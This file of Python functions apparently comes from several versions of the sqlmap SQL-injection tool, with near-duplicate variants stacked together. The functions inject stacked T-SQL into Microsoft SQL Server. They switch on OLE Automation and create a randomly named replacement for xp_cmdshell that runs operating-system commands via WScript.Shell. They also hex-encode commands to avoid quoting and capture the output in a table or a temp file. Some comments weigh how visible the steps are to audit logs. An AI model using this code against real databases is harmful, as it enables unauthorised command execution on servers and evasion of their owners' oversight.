def __xpCmdshellCreate(self):
    """Create a randomly named stand-in for xp_cmdshell built on OLE Automation.

    Two stacked batches are sent as the DBMS user through inject.goStacked():

    1. On 2005/2008 backends only: sp_configure turns on
       'show advanced options' and 'ole automation procedures', each
       followed by RECONFIGURE WITH OVERRIDE.
    2. CREATE PROCEDURE xp_<random> in master, wrapping
       sp_OACreate('WScript.Shell') -> sp_OAMethod(.., 'Run', ..) ->
       sp_OADestroy.  The procedure text travels inside a single-quoted
       nvarchar that is executed by sp_executesql, which is why the inner
       quotes are doubled.  On 2005/2008 a trailing RECONFIGURE WITH
       OVERRIDE is appended to the same batch.

    Side effects: sets self.__randStr, self.__xpCmdshellNew and
    self.xpCmdshellStr ("master..xp_<random>") for the other xpCmdshell*
    methods.  Both the server-configuration change and the new procedure in
    master are events SQL Server auditing can surface -- NOTE(review): how
    visible they are depends on the target's audit configuration.
    """
    if Backend.isVersionWithin(("2005", "2008")):
        logger.debug("activating sp_OACreate")
        activation_batch = "".join((
            "EXEC master..sp_configure 'show advanced options',1;",
            "RECONFIGURE WITH OVERRIDE;",
            "EXEC master..sp_configure 'ole automation procedures',1;",
            "RECONFIGURE WITH OVERRIDE",
        ))
        inject.goStacked(agent.runAsDBMSUser(activation_batch))

    # Two random tokens: one names the T-SQL variable, one the procedure.
    # Order of the randomStr() calls is kept as in the original.
    self.__randStr = randomStr(lowercase=True)
    self.__xpCmdshellNew = randomStr(lowercase=True)
    self.xpCmdshellStr = "master..xp_%s" % self.__xpCmdshellNew

    # Body of the dynamic CREATE PROCEDURE; it is embedded in a '...'
    # literal below, so its own string literals use doubled single quotes.
    procedure_text = (
        "CREATE PROCEDURE xp_%s(@cmd varchar(255)) AS DECLARE @ID int " % self.__xpCmdshellNew
        + "EXEC sp_OACreate ''WScript.Shell'',@ID OUT "
        + "EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 "
        + "EXEC sp_OADestroy @ID"
    )

    create_batch = "DECLARE @%s nvarchar(999);" % self.__randStr
    create_batch += "set @%s='%s';" % (self.__randStr, procedure_text)
    create_batch += "EXEC master..sp_executesql @%s" % self.__randStr

    if Backend.isVersionWithin(("2005", "2008")):
        create_batch += ";RECONFIGURE WITH OVERRIDE"

    inject.goStacked(agent.runAsDBMSUser(create_batch))
def __xpCmdshellConfigure(self, mode):
    """Run the version-specific batch that toggles xp_cmdshell.

    Args:
        mode: forwarded unchanged to __xpCmdshellConfigure2005 (2005/2008
            backends) or __xpCmdshellConfigure2000 (every other version);
            its meaning is defined by those helpers, not here.

    The statement the helper returns is executed as the DBMS user via
    inject.goStacked(); nothing is returned.
    """
    if Backend.isVersionWithin(("2005", "2008")):
        build_batch = self.__xpCmdshellConfigure2005
    else:
        build_batch = self.__xpCmdshellConfigure2000

    inject.goStacked(agent.runAsDBMSUser(build_batch(mode)))
def xpCmdshellForgeCmd(self, cmd, insertIntoTable=None):
    """Wrap an OS command line in a T-SQL batch that runs it via self.xpCmdshellStr.

    Args:
        cmd: the OS command line to hand to the xp_cmdshell-style procedure.
        insertIntoTable: optional support table (the original comment names
            'sqlmapoutput').  Without --dbms-cred the batch becomes
            INSERT INTO <table> EXEC ..., so the command output lands in
            that table.  With --dbms-cred the output is instead redirected
            to a temporary file on the host, recorded in self.tmpFile.

    Returns:
        The batch as wrapped by agent.runAsDBMSUser().

    Side effects: sets self.__randStr, self.__cmd, self.__forgedCmd and, on
    the --dbms-cred path, self.tmpFile.
    """
    # With --dbms-cred the output cannot be captured through INSERT ... EXEC
    # (the original comment says this path goes through OPENROWSET / BULK
    # INSERT), so it is redirected to a temp file fetched later.  A bare
    # 'del' of that file is forged without insertIntoTable and so skips this.
    if conf.dbmsCred and insertIntoTable:
        self.tmpFile = "%s/tmpc%s.txt" % (conf.tmpPath, randomStr(lowercase=True))
        cmd = '%s > "%s"' % (cmd, self.tmpFile)

    # The command is passed as a 0x.. hex literal, so the batch itself
    # contains no single quotes.
    self.__randStr = randomStr(lowercase=True)
    self.__cmd = "0x%s" % hexencode(cmd)

    fragments = [
        "DECLARE @%s VARCHAR(8000);" % self.__randStr,
        "SET @%s=%s;" % (self.__randStr, self.__cmd),
    ]
    if insertIntoTable and not conf.dbmsCred:
        fragments.append("INSERT INTO %s " % insertIntoTable)
    fragments.append("EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr))

    self.__forgedCmd = "".join(fragments)

    return agent.runAsDBMSUser(self.__forgedCmd)
def xpCmdshellForgeCmd(self, cmd, insertIntoTable=None):
    """Wrap an OS command line in a T-SQL batch that runs it via self.xpCmdshellStr.

    Args:
        cmd: the OS command line to hand to the xp_cmdshell-style procedure.
        insertIntoTable: optional support table (the original comment names
            'sqlmapoutput').  Without --dbms-cred the batch becomes
            INSERT INTO <table>(data) EXEC ..., so the command output lands
            in that table's 'data' column.  With --dbms-cred the output is
            instead redirected to a temporary file on the host, recorded in
            self.tmpFile.

    Returns:
        The batch as wrapped by agent.runAsDBMSUser().

    Side effects: sets self._randStr, self._cmd, self._forgedCmd and, on the
    --dbms-cred path, self.tmpFile.
    """
    # --dbms-cred path: INSERT ... EXEC cannot capture the output here (the
    # original comment attributes this to the OPENROWSET / BULK INSERT
    # route), so redirect it to a temp file that is fetched afterwards.
    # Forging the later 'del' of that file passes no insertIntoTable.
    if conf.dbmsCred and insertIntoTable:
        self.tmpFile = "%s/tmpc%s.txt" % (conf.tmpPath, randomStr(lowercase=True))
        cmd = '%s > "%s"' % (cmd, self.tmpFile)

    # Hex-encode the command so the batch carries no single quotes.
    self._randStr = randomStr(lowercase=True)
    self._cmd = "0x%s" % hexencode(cmd)

    if insertIntoTable and not conf.dbmsCred:
        insert_clause = "INSERT INTO %s(data) " % insertIntoTable
    else:
        insert_clause = ""

    self._forgedCmd = "DECLARE @%s VARCHAR(8000);SET @%s=%s;%sEXEC %s @%s" % (
        self._randStr,
        self._randStr,
        self._cmd,
        insert_clause,
        self.xpCmdshellStr,
        self._randStr,
    )

    return agent.runAsDBMSUser(self._forgedCmd)
def _xpCmdshellConfigure(self, mode):
    """Run the version-specific batch that toggles xp_cmdshell.

    Args:
        mode: forwarded unchanged to _xpCmdshellConfigure2000 on a 2000
            backend, otherwise to _xpCmdshellConfigure2005; its meaning is
            defined by those helpers.

    The returned statement is executed as the DBMS user through
    inject.goStacked(); nothing is returned.
    """
    legacy_backend = Backend.isVersionWithin(("2000", ))
    build_batch = self._xpCmdshellConfigure2000 if legacy_backend else self._xpCmdshellConfigure2005

    inject.goStacked(agent.runAsDBMSUser(build_batch(mode)))
def xpCmdshellForgeCmd(self, cmd):
    """Wrap an OS command line in a T-SQL batch that runs it via self.xpCmdshellStr.

    Args:
        cmd: the OS command line to hand to the xp_cmdshell-style procedure.

    Returns:
        The batch as wrapped by agent.runAsDBMSUser().

    Side effects: sets self.__randStr, self.__cmd and self.__forgedCmd.
    The command is passed as a 0x.. hex literal assigned to a random
    VARCHAR(8000) variable, so the batch itself contains no single quotes.
    """
    self.__randStr = randomStr(lowercase=True)
    self.__cmd = "0x%s" % hexencode(cmd)

    template = "DECLARE @%(var)s VARCHAR(8000);SET @%(var)s=%(val)s;EXEC %(proc)s @%(var)s"
    self.__forgedCmd = template % {
        "var": self.__randStr,
        "val": self.__cmd,
        "proc": self.xpCmdshellStr,
    }

    return agent.runAsDBMSUser(self.__forgedCmd)
def _xpCmdshellCreate(self):
    """Create a stand-in for xp_cmdshell named master..new_xp_cmdshell.

    Two stacked batches are sent as the DBMS user via inject.goStacked():

    1. On every backend except 2000: the 'activate_sp_oacreate' snippet
       (loaded by getSQLSnippet; its text is not visible here).
    2. The 'create_new_xp_cmdshell' snippet with RANDSTR=self._randStr,
       plus a trailing RECONFIGURE WITH OVERRIDE on non-2000 backends.

    Side effects: sets self._randStr and self.xpCmdshellStr.  Note that the
    procedure name is fixed in this version, unlike the randomised variants
    elsewhere in this file.
    """
    def run_as_dbms_user(batch):
        # Single place where a batch leaves the process.
        inject.goStacked(agent.runAsDBMSUser(batch))

    if not Backend.isVersionWithin(("2000",)):
        logger.debug("activating sp_OACreate")
        run_as_dbms_user(getSQLSnippet(DBMS.MSSQL, "activate_sp_oacreate"))

    self._randStr = randomStr(lowercase=True)
    self.xpCmdshellStr = "master..new_xp_cmdshell"

    create_batch = getSQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self._randStr)
    if not Backend.isVersionWithin(("2000",)):
        create_batch = create_batch + ";RECONFIGURE WITH OVERRIDE"

    run_as_dbms_user(create_batch)
def __xpCmdshellCreate(self):
    """Create a randomly named stand-in for xp_cmdshell (master..xp_<random>).

    Two stacked batches are sent as the DBMS user via inject.goStacked():

    1. On 2005/2008 backends only: the 'activate_sp_oacreate' snippet
       (loaded by getSQLSnippet; its text is not visible here).
    2. The 'create_new_xp_cmdshell' snippet rendered with
       RANDSTR=self.__randStr and XP_CMDSHELL_NEW=self.__xpCmdshellNew,
       plus a trailing RECONFIGURE WITH OVERRIDE on 2005/2008.

    Side effects: sets self.__randStr, self.__xpCmdshellNew and
    self.xpCmdshellStr.  The randomStr() calls are made in the same order
    as the original so the random stream is consumed identically.
    """
    needs_ole_activation = Backend.isVersionWithin(("2005", "2008"))

    if needs_ole_activation:
        logger.debug("activating sp_OACreate")
        activation_batch = getSQLSnippet(DBMS.MSSQL, "activate_sp_oacreate")
        inject.goStacked(agent.runAsDBMSUser(activation_batch))

    self.__randStr = randomStr(lowercase=True)
    self.__xpCmdshellNew = "xp_%s" % randomStr(lowercase=True)
    self.xpCmdshellStr = "master..%s" % self.__xpCmdshellNew

    create_batch = getSQLSnippet(
        DBMS.MSSQL,
        "create_new_xp_cmdshell",
        RANDSTR=self.__randStr,
        XP_CMDSHELL_NEW=self.__xpCmdshellNew,
    )

    # The version check is repeated rather than reused so the call pattern
    # matches the original exactly.
    if Backend.isVersionWithin(("2005", "2008")):
        create_batch += ";RECONFIGURE WITH OVERRIDE"

    inject.goStacked(agent.runAsDBMSUser(create_batch))
def _xpCmdshellCreate(self):
    """Create a randomly named stand-in for xp_cmdshell (master..xp_<random>).

    Two stacked batches are sent as the DBMS user via inject.goStacked():

    1. On 2005/2008/2012 backends: the 'activate_sp_oacreate' snippet
       (loaded by getSQLSnippet; its text is not visible here).
    2. The 'create_new_xp_cmdshell' snippet rendered with
       RANDSTR=self._randStr and XP_CMDSHELL_NEW=self._xpCmdshellNew,
       plus a trailing RECONFIGURE WITH OVERRIDE on 2005/2008 only.

    Side effects: sets self._randStr, self._xpCmdshellNew and
    self.xpCmdshellStr.  The randomStr() calls are made in the same order
    as the original so the random stream is consumed identically.
    """
    if Backend.isVersionWithin(("2005", "2008", "2012")):
        logger.debug("activating sp_OACreate")
        activation_batch = getSQLSnippet(DBMS.MSSQL, "activate_sp_oacreate")
        inject.goStacked(agent.runAsDBMSUser(activation_batch))

    self._randStr = randomStr(lowercase=True)
    self._xpCmdshellNew = "xp_%s" % randomStr(lowercase=True)
    self.xpCmdshellStr = "master..%s" % self._xpCmdshellNew

    create_batch = getSQLSnippet(
        DBMS.MSSQL,
        "create_new_xp_cmdshell",
        RANDSTR=self._randStr,
        XP_CMDSHELL_NEW=self._xpCmdshellNew,
    )

    # NOTE(review): this tuple omits "2012" although the activation check
    # above includes it; behaviour is kept as written -- confirm whether the
    # trailing RECONFIGURE is intentionally skipped on 2012.
    if Backend.isVersionWithin(("2005", "2008")):
        create_batch += ";RECONFIGURE WITH OVERRIDE"

    inject.goStacked(agent.runAsDBMSUser(create_batch))